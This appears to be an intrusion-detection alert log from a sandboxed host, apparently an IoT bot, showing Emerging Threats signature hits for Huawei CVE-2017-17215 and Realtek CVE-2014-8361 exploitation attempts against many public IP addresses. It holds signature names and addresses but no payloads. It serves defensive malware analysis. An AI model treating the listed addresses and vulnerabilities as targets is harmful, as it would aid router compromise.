                                      07/20/24-23:01:20.124696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329837215192.168.2.23197.172.242.183
                                      07/20/24-23:01:42.837135TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24725452869192.168.2.23204.152.123.98
                                      07/20/24-23:01:43.978983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5738452869192.168.2.23133.252.225.26
                                      07/20/24-23:01:52.019773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4291852869192.168.2.23115.65.225.50
                                      07/20/24-23:01:08.677189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5418052869192.168.2.23141.31.223.242
                                      07/20/24-23:01:27.655551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460237215192.168.2.23157.254.243.46
                                      07/20/24-23:01:02.731126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5604052869192.168.2.2362.90.39.173
                                      07/20/24-23:01:42.704267TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615524252869192.168.2.2331.234.118.120
                                      07/20/24-23:01:47.924852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200252869192.168.2.23143.225.143.5
                                      07/20/24-23:01:55.694589TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614856252869192.168.2.23150.16.14.245
                                      07/20/24-23:02:08.084136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4651852869192.168.2.23161.96.78.14
                                      07/20/24-23:01:09.058270TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439452869192.168.2.23186.94.179.5
                                      07/20/24-23:01:44.156178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4975852869192.168.2.23145.77.223.88
                                      07/20/24-23:01:42.434719TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23449452869192.168.2.23200.70.243.196
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235837215192.168.2.2317.67.251.17
                                      07/20/24-23:01:14.111381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923237215192.168.2.2364.60.172.121
                                      07/20/24-23:01:31.975158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5830637215192.168.2.23157.186.3.56
                                      07/20/24-23:01:42.147980TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25643252869192.168.2.23112.189.246.31
                                      07/20/24-23:01:31.979565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329437215192.168.2.23157.166.228.6
                                      07/20/24-23:01:44.277250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5461452869192.168.2.23192.12.75.155
                                      07/20/24-23:01:49.097048TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4460252869192.168.2.2323.185.211.99
                                      07/20/24-23:01:42.522141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615730852869192.168.2.2354.188.109.169
                                      07/20/24-23:01:02.690149TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615500252869192.168.2.23144.0.5.154
                                      07/20/24-23:01:08.590753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4630652869192.168.2.23169.107.25.12
                                      07/20/24-23:01:21.951975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635437215192.168.2.23113.91.21.81
                                      07/20/24-23:01:25.187391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5066852869192.168.2.23123.249.201.235
                                      07/20/24-23:01:42.425705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3943052869192.168.2.23159.183.134.67
                                      07/20/24-23:01:04.039128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904037215192.168.2.23151.22.190.51
                                      07/20/24-23:01:04.178669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614432652869192.168.2.23109.115.27.6
                                      07/20/24-23:01:45.854405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615090452869192.168.2.23106.212.70.208
                                      07/20/24-23:00:57.221583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513837215192.168.2.23197.213.7.238
                                      07/20/24-23:01:31.331748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5330452869192.168.2.2345.38.7.5
                                      07/20/24-23:01:42.790558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24772052869192.168.2.23112.201.119.160
                                      07/20/24-23:01:51.130270TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615473852869192.168.2.2349.152.226.6
                                      07/20/24-23:01:40.285038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000237215192.168.2.2340.163.171.209
                                      07/20/24-23:01:47.243820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23855052869192.168.2.2387.132.55.249
                                      07/20/24-23:01:55.076019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3815252869192.168.2.23123.227.205.159
                                      07/20/24-23:01:04.230950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539237215192.168.2.2341.83.34.135
                                      07/20/24-23:01:46.871315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4764252869192.168.2.2394.51.135.205
                                      07/20/24-23:01:42.664090TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25299852869192.168.2.23155.251.124.204
                                      07/20/24-23:01:54.901420TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5326852869192.168.2.23135.69.136.147
                                      07/20/24-23:01:40.275256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288637215192.168.2.2341.212.252.187
                                      07/20/24-23:01:45.452336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614057252869192.168.2.2390.144.20.22
                                      07/20/24-23:01:45.350108TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23409852869192.168.2.2374.130.124.117
                                      07/20/24-23:01:21.139934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5908252869192.168.2.2385.106.41.174
                                      07/20/24-23:01:53.085271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4853052869192.168.2.23143.107.137.70
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025237215192.168.2.23100.7.152.54
                                      07/20/24-23:01:41.722161TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25182452869192.168.2.2314.249.111.18
                                      07/20/24-23:00:57.221910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188037215192.168.2.23132.70.95.60
                                      07/20/24-23:01:54.345402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613906652869192.168.2.23221.77.89.150
                                      07/20/24-23:01:51.360754TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23370452869192.168.2.23164.28.92.86
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046637215192.168.2.23157.246.129.121
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172637215192.168.2.23197.233.159.133
                                      07/20/24-23:01:53.064325TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5978252869192.168.2.23131.175.175.175
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968437215192.168.2.2341.241.168.134
                                      07/20/24-23:01:14.006983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4588652869192.168.2.2362.216.86.224
                                      07/20/24-23:01:13.826513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615126452869192.168.2.239.70.14.160
                                      07/20/24-23:01:42.714534TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4401852869192.168.2.2339.205.206.142
                                      07/20/24-23:01:55.105161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614305652869192.168.2.2339.142.177.164
                                      07/20/24-23:01:34.045144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887237215192.168.2.23197.95.167.27
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388037215192.168.2.23197.122.165.99
                                      07/20/24-23:01:31.979752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809237215192.168.2.23197.207.171.251
                                      07/20/24-23:01:26.145029TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613332652869192.168.2.23121.166.138.14
                                      07/20/24-23:00:57.221570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330237215192.168.2.23157.143.196.120
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085637215192.168.2.2341.15.94.102
                                      07/20/24-23:01:42.704267TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24440052869192.168.2.23167.4.219.92
                                      07/20/24-23:01:40.307219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479237215192.168.2.23144.44.56.47
                                      07/20/24-23:01:42.136561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26001852869192.168.2.23118.130.245.154
                                      07/20/24-23:01:20.593003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4961652869192.168.2.2378.146.199.168
                                      07/20/24-23:01:42.500263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3887652869192.168.2.23176.130.206.241
                                      07/20/24-23:01:47.729778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5481652869192.168.2.23148.119.6.34
                                      07/20/24-23:01:58.751559TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614683052869192.168.2.232.29.217.143
                                      07/20/24-23:01:21.099180TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25175252869192.168.2.239.70.14.160
                                      07/20/24-23:01:42.477986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3937452869192.168.2.2382.79.140.185
                                      07/20/24-23:01:42.250039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5555852869192.168.2.23220.17.179.230
                                      07/20/24-23:01:01.623383TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5612252869192.168.2.2334.53.37.254
                                      07/20/24-23:01:42.898615TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614725852869192.168.2.23208.122.170.150
                                      07/20/24-23:01:01.313651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4125252869192.168.2.23188.92.250.125
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133237215192.168.2.23220.78.147.215
                                      07/20/24-23:01:10.698072TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614562252869192.168.2.23143.147.165.127
                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582437215192.168.2.23141.24.192.29
                                      07/20/24-23:01:44.416791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614797252869192.168.2.23167.144.253.27
                                      07/20/24-23:01:59.137101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26044852869192.168.2.2360.191.4.143
                                      07/20/24-23:01:24.877747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243637215192.168.2.23157.34.170.95
                                      07/20/24-23:01:41.318733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5984052869192.168.2.23125.128.111.151
                                      07/20/24-23:01:04.039129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286637215192.168.2.23157.100.128.69
                                      07/20/24-23:02:01.796252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4556452869192.168.2.23132.230.249.224
                                      07/20/24-23:00:59.163619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.23157.113.160.230
                                      07/20/24-23:01:50.380701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614042652869192.168.2.23139.56.86.16
                                      07/20/24-23:01:47.995202TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6013052869192.168.2.2365.82.234.209
                                      07/20/24-23:01:14.117066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697037215192.168.2.23147.3.130.23
                                      07/20/24-23:01:44.565131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3970852869192.168.2.23189.66.149.229
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701437215192.168.2.2319.58.9.63
                                      07/20/24-23:01:08.663245TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23602852869192.168.2.23168.229.219.185
                                      07/20/24-23:01:42.962388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4280652869192.168.2.23189.200.249.59
                                      07/20/24-23:02:06.767377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26071852869192.168.2.23157.69.166.230
                                      07/20/24-23:01:52.766296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498052869192.168.2.23134.168.191.164
                                      07/20/24-23:01:47.644828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4561052869192.168.2.2375.3.82.5
                                      07/20/24-23:01:42.662466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4729452869192.168.2.23112.102.125.164
                                      07/20/24-23:01:44.362240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615943652869192.168.2.2366.43.237.112
                                      07/20/24-23:00:57.221338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.23197.32.17.115
                                      07/20/24-23:01:42.699478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3569252869192.168.2.23158.36.226.221
                                      07/20/24-23:01:58.249114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694052869192.168.2.23213.9.81.218
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053037215192.168.2.2341.50.33.93
                                      07/20/24-23:01:43.023857TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24507452869192.168.2.2349.238.106.168
                                      07/20/24-23:01:27.650969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475237215192.168.2.23157.247.9.98
                                      07/20/24-23:01:41.549051TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4253652869192.168.2.238.243.36.237
                                      07/20/24-23:01:48.932731TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5402652869192.168.2.2397.241.192.98
                                      07/20/24-23:01:48.118060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953452869192.168.2.23192.178.20.121
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938037215192.168.2.23157.177.146.54
                                      07/20/24-23:01:41.722161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615100652869192.168.2.23169.160.238.67
                                      07/20/24-23:01:55.928013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24860852869192.168.2.2379.113.232.226
                                      07/20/24-23:02:03.032025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5386252869192.168.2.2363.42.182.153
                                      07/20/24-23:01:04.227976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987437215192.168.2.23197.234.180.134
                                      07/20/24-23:01:20.184321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650837215192.168.2.23113.230.74.224
                                      07/20/24-23:01:44.713195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5837652869192.168.2.23159.88.48.35
                                      07/20/24-23:01:58.202290TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613435052869192.168.2.2378.168.25.83
                                      07/20/24-23:01:21.931985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123237215192.168.2.2341.240.0.142
                                      07/20/24-23:01:08.562013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5505652869192.168.2.23212.114.230.189
                                      07/20/24-23:01:40.311124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744837215192.168.2.23157.148.206.73
                                      07/20/24-23:01:50.280308TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23741052869192.168.2.2391.203.103.36
                                      07/20/24-23:01:59.707283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3811852869192.168.2.2348.17.76.254
                                      07/20/24-23:01:44.944699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5616852869192.168.2.2391.160.10.25
                                      07/20/24-23:01:54.405308TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614741452869192.168.2.23176.129.124.225
                                      07/20/24-23:01:08.640831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3502652869192.168.2.23114.190.123.93
                                      07/20/24-23:01:41.290281TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615499252869192.168.2.2380.7.39.33
                                      07/20/24-23:02:09.704983TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615643652869192.168.2.23172.173.247.102
                                      07/20/24-23:01:47.163877TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23845252869192.168.2.23191.56.81.141
                                      07/20/24-23:01:11.180811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614087052869192.168.2.23164.126.39.49
                                      07/20/24-23:01:25.994344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3792452869192.168.2.23145.117.47.181
                                      07/20/24-23:01:48.286177TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25936452869192.168.2.2341.3.4.242
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599037215192.168.2.2341.84.70.245
                                      07/20/24-23:01:06.990165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584037215192.168.2.23197.128.152.66
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464437215192.168.2.23197.141.230.31
                                      07/20/24-23:00:57.221802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352037215192.168.2.2361.117.29.155
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859837215192.168.2.23157.122.28.196
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627037215192.168.2.2341.50.145.107
                                      07/20/24-23:01:48.102919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6057052869192.168.2.2366.43.237.112
                                      07/20/24-23:01:26.131973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613957652869192.168.2.2324.238.134.176
                                      07/20/24-23:01:48.701126TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23850052869192.168.2.2348.211.124.159
                                      07/20/24-23:01:42.912947TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614476452869192.168.2.2399.220.126.213
                                      07/20/24-23:01:44.756264TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25264652869192.168.2.23128.242.86.47
                                      07/20/24-23:00:59.213564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046437215192.168.2.2341.189.194.244
                                      07/20/24-23:01:53.269588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5498052869192.168.2.23166.201.201.44
                                      07/20/24-23:01:50.339110TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23521652869192.168.2.23125.185.15.217
                                      07/20/24-23:01:55.994693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476652869192.168.2.238.198.15.37
                                      07/20/24-23:01:43.917774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614259652869192.168.2.23172.124.39.209
                                      07/20/24-23:01:08.677485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5799252869192.168.2.2365.136.207.183
                                      07/20/24-23:01:43.013772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4121852869192.168.2.23107.204.90.199
                                      07/20/24-23:01:51.056707TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614231852869192.168.2.2361.237.192.205
                                      07/20/24-23:01:54.859884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3843052869192.168.2.2317.36.200.98
                                      07/20/24-23:01:43.177552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4821252869192.168.2.2366.34.14.57
                                      07/20/24-23:01:42.761962TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613787452869192.168.2.23180.231.223.193
                                      07/20/24-23:00:59.158278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635437215192.168.2.2384.167.140.65
                                      07/20/24-23:01:43.571815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4162452869192.168.2.23203.162.151.3
                                      07/20/24-23:01:44.118192TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4091852869192.168.2.23150.183.171.74
                                      07/20/24-23:01:45.764338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25336852869192.168.2.2390.133.16.151
                                      07/20/24-23:00:59.194576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5757637215192.168.2.23197.244.173.225
                                      07/20/24-23:01:31.317774TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24247852869192.168.2.23151.115.197.13
                                      07/20/24-23:02:12.142469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4609452869192.168.2.2372.122.103.48
                                      07/20/24-23:01:41.263056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159652869192.168.2.23145.236.96.35
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055437215192.168.2.23182.56.199.136
                                      07/20/24-23:01:31.991336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373437215192.168.2.2341.126.24.60
                                      07/20/24-23:01:08.667963TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23961252869192.168.2.2344.181.179.103
                                      07/20/24-23:01:45.116897TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4761452869192.168.2.23208.81.102.220
                                      07/20/24-23:01:43.088724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246052869192.168.2.23174.130.13.191
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372037215192.168.2.23157.43.220.26
                                      07/20/24-23:01:43.922614TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614486652869192.168.2.2394.187.41.215
                                      07/20/24-23:01:42.702731TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614013452869192.168.2.23126.163.211.196
                                      07/20/24-23:01:44.026968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3678252869192.168.2.2389.86.226.219
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479237215192.168.2.23139.13.89.177
                                      07/20/24-23:01:44.945909TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614205052869192.168.2.23153.239.16.237
                                      07/20/24-23:01:48.047800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615332252869192.168.2.2363.26.163.169
                                      07/20/24-23:01:45.194629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356652869192.168.2.2389.81.144.22
                                      07/20/24-23:01:47.413068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24813852869192.168.2.2394.8.52.195
                                      07/20/24-23:01:41.399866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406052869192.168.2.2359.109.143.129
                                      07/20/24-23:01:48.496838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5871652869192.168.2.23159.51.221.45
